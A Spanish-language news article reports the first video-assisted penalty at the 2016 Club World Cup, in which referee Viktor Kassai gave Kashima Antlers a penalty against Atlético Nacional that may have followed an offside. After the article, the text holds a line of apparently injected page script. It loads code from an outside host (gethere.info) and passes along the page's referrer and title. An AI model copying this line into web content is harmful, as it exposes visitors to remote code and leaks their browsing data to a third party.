Polémica: Se pita de manera incorrecta el primer penal asistido por video

El silbante Viktor Kassai, que llevó el A. Nacional-Kashima, revisó en una pantalla la acción y marcó un penalti
Los árbitros asistentes de vídeo (VARs), que se están probando por primera vez en el Mundial de Clubes de Japón 2016, irrumpieron con polémica durante la primera Semifinal entre el Atlético Nacional y el Kashima Antlers.

La tecnología ya ha demostrado el peso que puede llegar a tener en un partido ayudando alárbitro húngaro Viktor Kassai a señalar un penalti a favor del equipo japonés en el encuentro de ‘Semis‘.

Los VARs, después de revisar una jugada en la que los japoneses pidieron penalti, avisaron un minuto después a Kassai para que éste, tras detener el partido, en una pantalla colocada junto al terreno de juego revisara la acción de nuevo y tomase la decisión definitiva.

De esta forma, lo que había pasado desapercibido para el colegiado en directo, acabó convirtiéndose de forma inesperada en un penalti para el Kashima que transformó Shoma Doi en la primera diana del encuentro.

El encuentro finalizó con victoria por 0-3 del conjunto japonés ante un Atlético Nacional que no supo remontar el marcador adverso.

En lo que no reparó el colegiado húngaro fue que en la misma acción podría haber existido fuera de juego de un jugador del Kashima, lo que incrementa la polémica. Este Mundial de Clubes de Japón 2016 supone la primera vez en la historia que se pone en práctica esta asistencia del vídeo para ayudar a los árbitros en decisiones importantes en el desarrollo de los partidos.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

:)